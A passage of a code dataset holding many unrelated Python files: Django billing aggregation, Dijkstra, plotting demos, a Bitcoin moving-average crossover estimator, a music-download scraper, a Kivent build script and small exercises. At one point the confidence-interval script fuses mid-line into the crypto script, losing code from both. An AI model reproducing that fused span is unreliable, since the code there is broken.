zero(self.visitors().aggregate(Sum(\"fee\"))[\"fee__sum\"])\n context[\"visitors_unbilled\"] = zero(\n self.visitors().filter(billed=False).aggregate(Sum(\"fee\"))[\"fee__sum\"]\n )\n context[\"visitors_billed\"] = zero(\n self.visitors().filter(billed=True).aggregate(Sum(\"fee\"))[\"fee__sum\"]\n )\n\n context[\"items\"] = (\n self.items()\n .values(\"item_type__description\")\n .annotate(\n sum=Sum(\"amount\", filter=Q(invoice_id__isnull=False)),\n count=Count(\n \"item_type_id\", filter=Q(paid=True, invoice_id__isnull=False)\n ),\n unpaid_sum=Sum(\n \"amount\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unpaid_count=Count(\n \"item_type_id\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n .order_by(\"item_type_id\")\n )\n\n context[\"items_total\"] = self.items().aggregate(\n sum=Sum(\"amount\", filter=Q(paid=True, invoice_id__isnull=False)),\n count=Count(\"item_type_id\", filter=Q(paid=True, invoice_id__isnull=False)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False, invoice_id__isnull=False)),\n unpaid_count=Count(\n \"item_type_id\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n\n context[\"subs_detail\"] = (\n self.items()\n .filter(item_type_id=ItemType.SUBSCRIPTION)\n .values(\"subscription__membership__description\")\n .annotate(\n sum=Sum(\"amount\", filter=Q(paid=True)),\n count=Count(\"item_type_id\", filter=Q(paid=True)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False)),\n unpaid_count=Count(\"item_type_id\", filter=Q(paid=False)),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n .order_by(\"subscription__membership_id\")\n )\n\n context[\"subs_total\"] = (\n self.items()\n .filter(item_type_id=ItemType.SUBSCRIPTION)\n .aggregate(\n sum=Sum(\"amount\", filter=Q(paid=True)),\n count=Count(\"item_type_id\", filter=Q(paid=True)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False)),\n unpaid_count=Count(\"item_type_id\", filter=Q(paid=False)),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n )\n\n context[\"tournaments\"] = Event.billing.unbilled_total(\n item_type_id=ItemType.TOURNAMENT\n )\n context[\"social\"] = Event.billing.unbilled_total(item_type_id=ItemType.SOCIAL)\n return context\n\n def post(self, request, *args, **kwargs):\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n if form.is_valid():\n self.from_date = form.cleaned_data.get(\"from_date\", None)\n self.to_date = form.cleaned_data.get(\"to_date\", None)\n if \"filter\" in request.POST:\n return self.get(request, *args, **kwargs)\n elif \"export\" in request.POST:\n return export_pos(\n self.all_transactions().select_related(\"person\"),\n self.all_payments().select_related(\"person\"),\n )\n\n\ndef zero(value):\n return value if value else 0\n","sub_path":"members/views/billing_views.py","file_name":"billing_views.py","file_ext":"py","file_size_in_byte":16890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594525740","text":"import heapq\nfrom collections import deque\n\n\ndef dijkstra(pairs, distances, nodes, 
sursa, destinatie):\n    Q = []\n    selected = {}\n    parent = {}\n    dist_values = {}\n\n    for nod in nodes:\n        selected[nod] = False\n\n    selected[sursa] = True\n\n    for nod in nodes:\n        if nod in pairs[sursa]:\n            dist_values[nod] = distances[(sursa, nod)]\n            heapq.heappush(Q, nod)\n            parent[nod] = sursa\n        else:\n            dist_values[nod] = float(\"inf\")\n            parent[nod] = None\n\n    while len(Q) != 0:\n        u = heapq.heappop(Q)\n        selected[u] = True\n        for nod in pairs[u]:\n            if (not selected[nod]) and dist_values[nod] > dist_values[u] + distances[(u, nod)]:\n                dist_values[nod] = dist_values[u] + distances[(u, nod)]\n                parent[nod] = u\n                heapq.heapify(Q)\n\n    # a deque (double-ended queue), so we can insert at the front\n    drum = deque()\n    nod = parent[destinatie]\n\n    while nod != None:\n        drum.appendleft(nod)\n        nod = parent[nod]\n\n    # also append the destination\n    drum.append(destinatie)\n\n    # return the path\n    return \"Path between %s and %s: %s\" % (sursa, destinatie, list(drum))\n\n\nif __name__ == '__main__':\n    input = open(\"dijkstra.in\", \"r\")\n    N = int(input.readline())\n    nodes = []\n    for i in range(N):\n        # rstrip removes newlines\n        nodes.append(input.readline().rstrip())\n\n    M = int(input.readline())\n    pairs = {}\n    distances = {}\n    for i in range(M):\n        [x, y, cost] = input.readline().split()\n        pairs.setdefault(x, list()).append(y)\n        pairs.setdefault(y, list()).append(x)\n        distances[(x, y)] = int(cost)\n        distances[(y, x)] = int(cost)\n\n\n    print(\"PAIRS: \", pairs)\n    print()\n\n    print(\"DISTANCES: \", distances)\n    print()\n\n    print(\"NODES: \", nodes)\n    print()\n\n    sursa = \"Bucuresti\"\n\n    for destinatie in nodes:\n        print(dijkstra(pairs, distances, nodes, sursa, destinatie))\n","sub_path":"Dijkstra-algorithm/Dijkstra algorithm.py","file_name":"Dijkstra algorithm.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"566290954","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx=np.linspace(0.,1.,100)\ny=x**2\n\n#Basic plot of a curve\nplt.figure()\nplt.plot(x,y)\nplt.show()\n\n#same curve on a log log plot\nplt.figure()\nplt.yscale('log')\nplt.xscale('log')\nplt.plot(x,y)\nplt.show()\n\n\n# scatter versus plot\nplt.figure()\nplt.scatter(x,y)\nplt.show()\n\n\n\n# bar chart versus plot, fix xrange\nplt.figure()\nplt.bar(x,y,0.01)\nplt.xlim(0.,1.)\n#plt.show()\nplt.savefig('bar.pdf', format='pdf')\nplt.close()\n","sub_path":"Lecture 2/basicplot.py","file_name":"basicplot.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"540343048","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 15 16:25:48 2019\r\n\r\n@author: mirco\r\n\"\"\"\r\n\"\"\"1: confidence interval for the mean\"\"\"\r\nimport numpy as np\r\nimport tavole\r\n\r\narr=np.array([4.09,4.56,5.01,5.49,4.82,5.56,3.95,4.04,2.63,3.78,\r\n              3.58,4.52,4.86,3.65,4.44,4.62,3.97,3.63])\r\nn=len(arr)\r\nalfa=0.05\r\nvar=1\r\n\r\nprint('1: confidence interval for the mean')\r\n\"\"\"1_mean \"\"\"\r\ni=0\r\nbuf=0\r\nsum=0\r\nwhile i signals['mid_mavg'][short_window:], 1.0, 0.0)\n    signals['positions'] = signals['signal'].diff()\n\n    plt.figure(figsize=(14, 7))\n    plt.plot(btc_adj.index, btc_adj, lw=3, alpha=0.8, label='Original observations')\n    plt.plot(btc_adj.index, roll_d10, lw=3, alpha=0.8, label='Rolling mean (window 50)')\n    plt.plot(btc_adj.index, roll_d50, lw=3, alpha=0.8, label='Rolling mean (window 200)')\n    plt.plot(signals.loc[signals.positions == 
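# --- editor's illustration (added; a minimal self-contained sketch of the
# crossover-signal logic used around this point, mirroring the column names
# in the surrounding sample) ---
import numpy as np
import pandas as pd

def crossover_signals(prices, short_window=50, mid_window=200):
    signals = pd.DataFrame(index=prices.index)
    signals['short_mavg'] = prices.rolling(window=short_window).mean()
    signals['mid_mavg'] = prices.rolling(window=mid_window).mean()
    # 1.0 while the short average sits above the long one, else 0.0
    signals['signal'] = np.where(signals['short_mavg'] > signals['mid_mavg'], 1.0, 0.0)
    # +1 marks a golden cross (buy), -1 a death cross (sell)
    signals['positions'] = signals['signal'].diff()
    return signals
# --- end illustration ---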
1.0].index,\n signals.short_mavg[signals.positions == 1.0],\n '^', markersize=10, color='r', label='buy')\n\n plt.plot(signals.loc[signals.positions == -1.0].index,\n signals.short_mavg[signals.positions == -1.0],\n 'v', markersize=10, color='k', label='sell')\n\n plt.title('BTC-USD Adj Close Price (The Technical Approach)')\n plt.tick_params(labelsize=12)\n plt.legend(loc='upper left', fontsize=12)\n\n plt.show()\n\n # plt.savefig('images/intersection-1.png')\n\n\ndef rsi_peaks(closePrices, candles=10):\n\n np.random.seed(42)\n\n fig, ax = plt.subplots(facecolor='#07000d')\n\n ax.set_facecolor('#07000d')\n\n #fig = plt.figure(facecolor='#07000d')\n # ax = plt.subplot2grid((6,4), (0,0), axisbg='#07000d')\n\n rsiCol = '#c1f9f7'\n posCol = '#386d13'\n negCol = '#8f2020'\n\n rsi = talib.RSI(closePrices, timeperiod=14)\n\n # https://gist.github.com/sixtenbe/1178136#file-peakdetect-py\n # cb = np.array([-0.010223, ...])\n # peaks = peakdetect(cb, lookahead=100)\n\n minima = []\n maxima = []\n\n rsi_n = rsi[-candles:]\n\n for i in range(1, candles-1):\n\n if rsi_n[i] < rsi_n[i-1] and rsi_n[i] < rsi_n[i+1]:\n # local minima\n minima.append(i)\n if rsi_n[i] > rsi_n[i - 1] and rsi_n[i] > rsi_n[i + 1]:\n # local maxima\n maxima.append(i)\n\n # peaks, _ = find_peaks(rsi_n.values, height=60)\n\n ax.plot(rsi[-candles:].index, rsi[-candles:].values, rsiCol, label=\"RSI\", linewidth=1.5)\n # plt.plot(rsi_n[peaks].index, rsi_n[peaks].values, \"x\")\n\n ax.fill_between(rsi[-candles:].index, rsi[-candles:].values, 70, where=(rsi[-candles:].values >= 70), facecolor=negCol, edgecolor=negCol, alpha=0.5)\n ax.fill_between(rsi[-candles:].index, rsi[-candles:].values, 30, where=(rsi[-candles:].values <= 30), facecolor=posCol, edgecolor=posCol, alpha=0.5)\n\n ax.set_yticks([30, 70])\n ax.yaxis.label.set_color(\"w\")\n ax.spines['bottom'].set_color(\"#5998ff\")\n ax.spines['top'].set_color(\"#5998ff\")\n ax.spines['left'].set_color(\"#5998ff\")\n ax.spines['right'].set_color(\"#5998ff\")\n ax.tick_params(axis='y', colors='w')\n ax.tick_params(axis='x', colors='w')\n\n plt.ylabel('RSI')\n\n ax.plot(rsi_n[maxima], \"x\")\n\n fig.autofmt_xdate()\n\n ax.axhline(70, color=negCol)\n ax.axhline(30, color=posCol)\n\n ax.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')\n plt.ylabel('RSI')\n\n ax.grid(True, color='w')\n\n plt.show()\n\n\ndef plot_next_cross(data1, data, prices_a, prices_b):\n D = np.array(data1)\n T = np.array(data)\n E1 = np.array(prices_a)\n E2 = np.array(prices_b)\n\n A = np.column_stack([T ** 0, T])\n\n p1, pint1, se1 = regress(A, E1, alpha=0.05)\n\n p2, pint2, se2 = regress(A, E2, alpha=0.05)\n\n # Now we have two lines: y1 = m1*T + b1 and y2 = m2*T + b2\n # they intersect at m1*T + b1 = m2*T + b2\n # or at T = (b2 - b1) / (m1 - m2)\n b1 = u.ufloat(p1[0], se1[0])\n m1 = u.ufloat(p1[1], se1[1])\n\n b2 = u.ufloat(p2[0], se2[0])\n m2 = u.ufloat(p2[1], se2[1])\n\n T_intersection = (b2 - b1) / (m1 - m2)\n # print(T_intersection)\n\n T_intersect_nv = T_intersection.nominal_value\n\n print(datetime.datetime.fromtimestamp(int(T_intersect_nv)))\n\n fig, ax = plt.subplots()\n\n # plt.figure()\n\n ax.set(xlabel=\"Date\", ylabel=\"Price (USD)\", )\n ax.set_title(\"Golden/Death Cross\\nEstim. 
Date\")\n\n myFmt = DateFormatter(\"%m-%d\")\n\n ax.xaxis.set_major_formatter(myFmt)\n ax.tick_params(axis='x', rotation=45)\n\n # plot the data, the fits and the intersection and \\pm 2 \\sigma.\n ax.plot(D, E1, 'bo ', label='MA50')\n ax.plot(D, np.dot(A, p1), 'b-')\n ax.plot(D, E2, 'ro ', label='MA200')\n ax.plot(D, np.dot(A, p2), 'r-')\n\n a = datetime.datetime.fromtimestamp(int(T_intersect_nv))\n b = (b1 + m1 * T_intersection).nominal_value\n\n ax.plot(a, b, 'go', ms=13, alpha=0.2, label='Intersection')\n\n label = \"{:.2f}\".format(b) + \" - \" + str(a.date())\n\n ax.annotate(label, xy=(a, b), xycoords='data', xytext=(a, b),\n arrowprops=dict(facecolor='black', shrink=0.05))\n\n x = datetime.datetime.fromtimestamp(int((T_intersect_nv - 2 * T_intersection.std_dev)))\n\n y = datetime.datetime.fromtimestamp(int((T_intersect_nv + 2 * T_intersection.std_dev)))\n\n plt.show(block=False)\n\n '''\n ax.plot([x,\n y],\n [(b1 + m1 * T_intersection).nominal_value,\n (b1 + m1 * T_intersection).nominal_value],\n 'g-', lw=0.5, label='$\\pm 2 \\sigma$')\n '''\n\n ax.legend(loc='best')\n plt.show(block=True)\n\n\ndef main():\n\n # number of daily candles to analyze\n\n x = 60\n\n date_str = (datetime.datetime.now() - datetime.timedelta(days=x)).date()\n\n btc = web.get_data_yahoo('BTC-USD', start=datetime.datetime(2017, 1, 1), end=date.today())\n\n btc_adj = btc['Adj Close']\n\n # show rsi peaks (beta)\n # rsi_peaks(btc_adj)\n\n # btc_adj.plot(lw=2.5, figsize=(12, 5))\n # plt.show()\n\n short_window = 50\n mid_window = 200\n\n signals = pd.DataFrame(index=btc_adj.index)\n signals['signal'] = 0.0\n\n roll_d10 = btc_adj.rolling(window=short_window).mean()\n roll_d50 = btc_adj.rolling(window=mid_window).mean()\n\n signals['short_mavg'] = roll_d10\n signals['mid_mavg'] = roll_d50\n\n\n data_normal = roll_d10[-x:].index.tolist()\n\n # data_ts = [int(time.mktime(roll_d10[-1:].index[0].timetuple()) ), int(time.mktime(roll_d10[-20:].index[0].timetuple()) )]\n # convert time to timestamp to act as a number\n data_ts = (roll_d10[-x:].index.astype(np.int64) // 10 ** 9).tolist()\n\n prices_a = roll_d10[-x:].tolist()\n prices_b = roll_d50[-x:].tolist()\n\n plot_next_cross(data_normal, data_ts, prices_a, prices_b)\n\n # plot_crosses(signals, btc_adj, roll_d10, roll_d50)\n\n print(cross_date(data_normal, data_ts, prices_a, prices_b))\n\n\nif __name__ == '__main__':\n main()","sub_path":"ta-cross.py","file_name":"ta-cross.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"459308686","text":"\ndef seconds(seconds_list):\n new_list = []\n for element in range(1, len(seconds_list)):\n if element % 2 != 0:\n new_list.append(seconds_list[element])\n return new_list\n\n # Create a function that takes a list as a parameter,\n # and returns a new list with every second element from the orignal list\n # example: [1, 2, 3, 4, 5] should produce [2, 4]\n\nprint(seconds([1, 2, 3, 4, 5, 6])) # should print [2, 4]\n","sub_path":"seconds/seconds_solution.py","file_name":"seconds_solution.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"189040749","text":"import os\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nURL = \"https://losslessplus.com/visit.php?job=viewresult&sid=5a9c9c50497cfdf68758b4e868955d2d\"\n\nresp = requests.get(URL)\n\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\nfor a in reversed(soup.find_all(\"a\", 
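# --- editor's note (added illustration, not part of the original samples) ---
# The seconds() helper in the record above walks indices to keep every second
# element; Python's extended slicing expresses the same transform directly:
def seconds_by_slicing(values):
    return values[1::2]

assert seconds_by_slicing([1, 2, 3, 4, 5]) == [2, 4]
assert seconds_by_slicing([1, 2, 3, 4, 5, 6]) == [2, 4, 6]
# --- end note ---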
class_=\"linkbai\")):\n tenbai = a.text\n linkbai = requests.get(a.get(\"href\"))\n linkbai_soup = BeautifulSoup(linkbai.text, \"html.parser\")\n download_link_0 = linkbai_soup.find(id=\"zoomtext\").find(\n \"div\", class_=\"quote-content-2\").a.get(\"href\")\n download_link_1 = requests.get(\n download_link_0.replace(\"url.php\", \"url2.php\"))\n download_link_1_soup = BeautifulSoup(download_link_1.text, \"html.parser\")\n content = download_link_1_soup.find(\n \"meta\", {\"http-equiv\": \"refresh\"}).get(\"content\")\n local_file_name = tenbai + \".flac\"\n drive_link = content.split(\"url=\")[-1]\n print(drive_link)\n if not os.path.exists(\"download/\" + local_file_name):\n with requests.get(drive_link, stream=True) as r:\n try:\n r.raise_for_status()\n with open(\"download/\" + local_file_name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192):\n if chunk:\n f.write(chunk)\n except Exception as e:\n print(e)\n print(tenbai)\n pass\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"535758080","text":"\n\ninvestment =400000\nprofit=10\ncategory_index=[1,2,3]\ninterval_percentage=0.8\ndef no_of_shares(investment,stock_price):\n no_of_shares= round(investment/stock_price)\n return no_of_shares\n\n\n\n\n\n\ndef taxes(no_of_shares,sell_value,buy_value,diff):\n turnaround=no_of_shares*(sell_value+buy_value)\n print('turnaround',turnaround)\n brokerage= min(20,turnaround*0.0001) \n print('brokerage',brokerage)\n stt= round((sell_value*no_of_shares)*0.00025)\n print('stt',stt)\n tc=round(turnaround*0.0000325,2)\n print('tc',tc)\n gst=round(0.18*(brokerage+tc),2)\n print('gst',gst)\n sebi=round(0.000001*turnaround,2)\n print('sebi',sebi)\n stamp=round(0.000002*turnaround,2)\n print('stamp',stamp)\n total=brokerage+stt+tc+gst+sebi+stamp\n print(\"Total Cost\",total)\n print(\"trade_profit\",diff)\n pnl=diff-total\n\n \n return pnl\n\ndef check_lables( profit, call):\n \n label=[0,0]\n if profit in range (10, 100):\n label= [call,1]\n elif int(profit) in range (100, 300):\n label= [call,2]\n elif int(profit) in range (300, 500):\n label= [call,3]\n elif profit>= 500:\n label= [call,4]\n else:\n label= [3,0]\n\n label=int(\"\".join(map(str, label)))\n \n return label\n\n\ndef category_generator(first,nxt):\n high_future_price = nxt['high'].max()\n low_future_price=nxt['low'].min()\n buy_price= first['close'].iloc[-1]\n \n #shares= no_of_shares(investment,buy_price)\n if ((high_future_price-buy_price)/buy_price )*100 >=((buy_price-low_future_price)/buy_price )*100 and ((high_future_price-buy_price)/buy_price )*100 >= interval_percentage:\n \n call=1 # buy \n # buy_value=buy_price\n # sell_value=high_future_price\n # diff= abs(buy_price-sell_value)*shares\n elif ((buy_price-low_future_price)/buy_price )*100 >= interval_percentage :\n call=2 # sell\n # sell_value=low_future_price\n # buy_value=buy_price\n # diff= abs(buy_price-sell_value)*shares\n else:\n call= 3 # dont do anything\n # sell_value=buy_price\n # buy_value=buy_price\n # diff= abs(buy_price-sell_value)*shares\n \n\n \n # print('Call is',call)\n # pnl =taxes(shares,sell_value,buy_value,diff)\n # cat=check_lables( pnl, call)\n cat_index=category_index.index(call)\n \n\n\n return cat_index\n\n\n\n \n\n\n 
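# --- editor's note (added illustration, not part of category_generator.py) ---
# check_lables() above tests `profit in range(10, 100)`; range membership only
# matches integers, so a float profit such as 50.5 silently falls through to
# the else branch. Plain chained comparisons classify floats and ints alike:
def profit_band(profit):
    if 10 <= profit < 100:
        return 1
    elif 100 <= profit < 300:
        return 2
    elif 300 <= profit < 500:
        return 3
    elif profit >= 500:
        return 4
    return 0

assert profit_band(50.5) == 1  # `50.5 in range(10, 100)` is False
# --- end note ---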
\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"category_generator.py","file_name":"category_generator.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482814430","text":"import string\nalphaconst=list(string.ascii_lowercase)\nalphavowels=[\"a\",\"e\",\"i\",\"o\",\"u\"]\nfor i in alphavowels:\n if i in alphaconst:\n alphaconst.remove(i)\nalphexcep=['be', 'see', 'flee', 'knee']\n\n\ndef make_ing_form(stringlist,n):\n stringlist=list(stringlist)\n if stringlist[2] == 'e' and stringlist[1]=='i':\n stringlist=stringlist[0]+\"ying\"\n return stringlist\n elif stringlist[2]=='e' and n not in alphexcep:\n stringlist=\"\".join(stringlist[0:2])+\"ing\"\n return stringlist\n\n elif stringlist[0] in alphaconst and stringlist[1] in alphavowels and stringlist[2] in alphaconst:\n stringlist=\"\".join(stringlist)+\"{0}ing\".format(stringlist[2])\n return stringlist\n else:\n if n in alphexcep:\n return \"\".join(stringlist)\n else:\n return \"\".join(stringlist)+\"ing\"\n\nn=input(\"Enter a word\")\nlaststr=n[len(n):-4:-1]\nlaststr=laststr[::-1]\nprint(laststr)\nfirststr=n[0:len(n)-3:1]\nprint(firststr)\nn1=make_ing_form(laststr,n)\nn=firststr+n1\nprint(\"\".join(n))","sub_path":"Two/Q8.py","file_name":"Q8.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"215197974","text":"from os import environ, remove\nfrom os.path import dirname, join, isfile\nfrom distutils.core import setup\nimport kivy\nfrom distutils.extension import Extension\ntry:\n from Cython.Build import cythonize\n from Cython.Distutils import build_ext\n have_cython = True\nexcept ImportError:\n have_cython = False\nimport sys\n\n\nplatform = sys.platform\nif platform == 'win32':\n cstdarg = '-std=gnu99'\n libraries = ['opengl32', 'glu32','glew32']\nelse:\n cstdarg = '-std=c99'\n libraries = []\n\ndo_clear_existing = True\n\n\n\npolygen_modules = {\n 'kivent_polygen.polygen_renderers': ['kivent_polygen/polygen_renderers.pyx',],\n 'kivent_polygen.polygen_formats': ['kivent_polygen/polygen_formats.pyx',],\n}\n\npolygen_modules_c = {\n 'kivent_polygen.polygen_renderers': ['kivent_polygen/polygen_renderers.c',],\n 'kivent_polygen.polygen_formats': ['kivent_polygen/polygen_formats.c',],\n}\n\ncheck_for_removal = [\n 'kivent_polygen/polygen_formats.c',\n 'kivent_polygen/polygen_renderers.c',\n\n ]\n\ndef build_ext(ext_name, files, include_dirs=[]):\n return Extension(ext_name, files, include_dirs,\n extra_compile_args=[cstdarg, '-ffast-math',],\n libraries=libraries,)\n\nextensions = []\npolygen_extensions = []\ncmdclass = {}\n\ndef build_extensions_for_modules_cython(ext_list, modules):\n ext_a = ext_list.append\n for module_name in modules:\n ext = build_ext(module_name, modules[module_name], \n include_dirs=kivy.get_includes())\n if environ.get('READTHEDOCS', None) == 'True':\n ext.pyrex_directives = {'embedsignature': True}\n ext_a(ext)\n return cythonize(ext_list)\n\ndef build_extensions_for_modules(ext_list, modules):\n ext_a = ext_list.append\n for module_name in modules:\n ext = build_ext(module_name, modules[module_name], \n include_dirs=kivy.get_includes())\n if environ.get('READTHEDOCS', None) == 'True':\n ext.pyrex_directives = {'embedsignature': True}\n ext_a(ext)\n return ext_list\n\nif have_cython:\n if do_clear_existing:\n for file_name in check_for_removal:\n if isfile(file_name):\n remove(file_name)\n polygen_extensions = 
build_extensions_for_modules_cython(\n        polygen_extensions, polygen_modules)\nelse:\n    polygen_extensions = build_extensions_for_modules(polygen_extensions, \n        polygen_modules_c)\n\n\nsetup(\n    name='KivEnt Polygen',\n    description='''A game engine for the Kivy Framework. \n    https://github.com/Kovak/KivEnt for more info.''',\n    author='Jacob Kovac',\n    author_email='kovac1066@gmail.com',\n    ext_modules=polygen_extensions,\n    cmdclass=cmdclass,\n    packages=[\n        'kivent_polygen',\n        ],\n    package_dir={'kivent_polygen': 'kivent_polygen'})\n","sub_path":"modules/polygen/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"30037423","text":"# Motivation for Builder\r\n# If this were a real application it would probably have to deal with an \r\n# endless list of attributes to configure\r\n# Note: this code is not meant to be run!\r\n\r\nclass Robot:\r\n    def __init__(self, left_leg, right_leg, left_arm, right_arm,\r\n                 left_wing, right_wing, tail, blades, cameras,\r\n                 infrared_module #, ...\r\n                 ):\r\n        self.left_leg = left_leg\r\n        if left_leg == None:\r\n            bipedal = False\r\n        self.right_leg = right_leg\r\n        self.left_arm = left_arm\r\n        self.right_arm = right_arm\r\n        # ...\r\n\r\n","sub_path":"robot_bad.py","file_name":"robot_bad.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"33199058","text":"import numpy as np\nimport random\nfrom collections import Counter\nfrom abjad import *\nfrom copy import deepcopy\n\ncontainer = []\nintervals = [.5, 1.5, 2.5, 3.5]\nfor interval in intervals:\n\tstarting_pitch = 25\n\twhile (starting_pitch > 16):\n\t\tif (starting_pitch != 19.5 and starting_pitch - interval != 19.5 and starting_pitch - 2*interval != 19.5):\n\t\t\tcontainer.append(starting_pitch)\n\t\t\tcontainer.append(starting_pitch - interval)\n\t\t\tcontainer.append(starting_pitch - 2*interval)\n\t\telse:\n\t\t\tcontainer.append(11)\n\t\t\tcontainer.append(11)\n\t\t\tcontainer.append(11)\n\t\tfor i in range(5):\n\t\t\tcontainer.append(11)\n\t\tstarting_pitch -= 1/2.\n\tfor j in range(8):\n\t\tcontainer.append(30)\n\n# make/show score\ncontainer = [Note(pit,1/8.) for pit in container]\ninstruments = set(['Flute'])\nparts = {instrument: Staff([], name=instrument) for instrument in instruments}\nparts['Flute'].extend(container)\nscore = Score([parts[instrument] for instrument in parts], name=\"poopy\")\nattach(MetronomeMark((1,4), 160), parts['Flute'][0])\nshow(score)","sub_path":"trash/scripts/triads.py","file_name":"triads.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"426507353","text":"'''\n@Author: ruoru\n@Date: 2019-11-07 11:06:02\n@LastEditors: ruoru\n@LastEditTime: 2019-11-07 11:24:30\n@Description: https://leetcode-cn.com/explore/interview/card/top-interview-questions-easy/5/strings/39/\n'''\n\n# New in version 3.2.\nfrom functools import lru_cache\n\nclass Solution(object):\n    \"\"\"\n    1. 1      the initial number\n    2. 11     the previous number for 2 is 1; its say-sequence is 1, read as one 1, i.e. 11\n    3. 21     the previous number for 3 is 2; its say-sequence 11 reads as two 1s, i.e. 21\n    4. 1211   the previous number for 4 is 3; its say-sequence 21 reads as one 2, one 1, i.e. 1211\n    5. 111221 the previous number for 5 is 4; its say-sequence 1211 reads as one 1, one 2, two 1s, i.e. 111221\n    \"\"\"\n\n    def get_seq(self, seq):\n        cur_char = seq[0]\n        cur_count = 1\n        result = []\n        for c in seq[1::]:\n            if c == cur_char:\n                cur_count += 1\n            else:\n                result.append(\"{}{}\".format(cur_count, cur_char))\n                cur_char = c\n                cur_count = 1\n        # flush the final run of characters\n        result.append(\"{}{}\".format(cur_count, cur_char))\n        return \"\".join(result)\n    \n    @lru_cache(maxsize=30)\n    def countAndSay(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: str\n        \"\"\"\n        # First idea: since the problem caps n at 30, all results for 1-30 could be precomputed and stored\n        # Second idea: recursion\n        if n == 1:\n            return \"1\"\n        \n        pre_seq = self.countAndSay(n - 1)\n        return self.get_seq(pre_seq)\n\n\nif __name__ == \"__main__\":\n    s = Solution()\n    # print(s.get_seq(\"1\"))\n    # print(s.get_seq(\"11\"))\n    # print(s.get_seq(\"1211\"))\n    # print(s.get_seq(\"111221\"))\n    print(s.countAndSay(1))\n    print(s.countAndSay(2))\n    print(s.countAndSay(3))\n    print(s.countAndSay(4))\n    print(s.countAndSay(5))\n    print(s.countAndSay(6))\n    print(s.countAndSay(5))\n    print(s.countAndSay(4))\n    print(s.countAndSay(3))\n    print(s.countAndSay.cache_info())","sub_path":"explore_cn/top_interview_questions_easy/b_strings/02_strings_39.py","file_name":"02_strings_39.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"627486537","text":"class sparse_token:\n\n    def __init__(self,_value='',_type='',_ln=-1,_pos=-1,_fname=''):\n        self.fname=_fname\n        self.ln=_ln\n        self.pos=_pos\n        self.value=_value\n        self.type=_type\n\n    def __repr__(self):\n        return \"(%s:%s)\" % (self.type,self.value)\n\n    def copy(self):\n        return sparse_token(_value=self.value[:],\n                            _type=self.type[:],\n                            _fname=self.fname[:],\n                            _ln=self.ln,\n                            _pos=self.pos)\n\n    def matches(self,pattern_token,case_sensitive=True):\n        type_match=True\n        value_match=True\n        if pattern_token.type!='':\n            type_match=(pattern_token.type==self.type)\n        if pattern_token.value!='':\n            if case_sensitive:\n                value_match=(pattern_token.value==self.value)\n            else:\n                value_match=(pattern_token.value.lower()==self.value.lower())\n        return type_match and value_match\n","sub_path":"python/sparse_token.py","file_name":"sparse_token.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
